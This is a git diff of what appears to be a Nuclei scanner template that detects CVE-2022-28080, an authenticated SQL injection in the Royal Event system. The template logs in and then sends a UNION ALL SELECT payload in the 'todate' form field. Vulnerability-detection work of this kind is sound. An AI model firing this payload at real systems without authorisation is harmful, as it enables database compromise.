diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index 555a81ec0c..9ef9f47616 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -2,90 +2,68 @@ id: CVE-2022-28080 info: name: Royal Event - SQL Injection - author: lucasljm2001,ekrause + author: lucasljm2001,ekrause,ritikchaddha severity: high description: | Detects an SQL Injection vulnerability in Royal Event System reference: + - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - tags: cve,cve2022,sqli,authenticated + tags: cve,cve2022,sqli,authenticated,cms,royalevent requests: - - raw: - + - raw: - | POST /royal_event/ HTTP/1.1 - Host: {{Host}} - Content-Length: 353 - Cache-Control: max-age=0 - sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102" - sec-ch-ua-mobile: ?0 - sec-ch-ua-platform: "Windows" - Upgrade-Insecure-Requests: 1 - Origin: {{Scheme}}://{{Host}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary841M7QIgh7rqLsVh - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Referer: {{Scheme}}://{{Host}}/royal_event/ - Accept-Encoding: gzip, deflate - Accept-Language: es-ES,es;q=0.9 - Connection: close + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="username" + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" - {{username}} - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="password" + {{username}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" - {{password}} - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="login" + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" - ------WebKitFormBoundary841M7QIgh7rqLsVh-- + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + - | - POST /royal_event/btndates_report.php#?= HTTP/1.1 - Host: {{Host}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Encoding: gzip, deflate - Accept-Language: en-us,en;q=0.5 - Cache-Control: no-cache - Content-Length: 334 - Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 - Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?= - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - --f289a6438bcc45179bcd3eb7ddc555d0 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="todate" - -'select SomeRandomText from tbladmin-- - --f289a6438bcc45179bcd3eb7ddc555d0 + 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="search" 3 - --f289a6438bcc45179bcd3eb7ddc555d0 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="fromdate" 01/01/2011 - --f289a6438bcc45179bcd3eb7ddc555d0-- + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '{{md5("{{randstr}}")}}' - matchers: - - type: word - words: - - "SomeRandomText" - - - type: status - status: - - 200 + - type: status + status: + - 200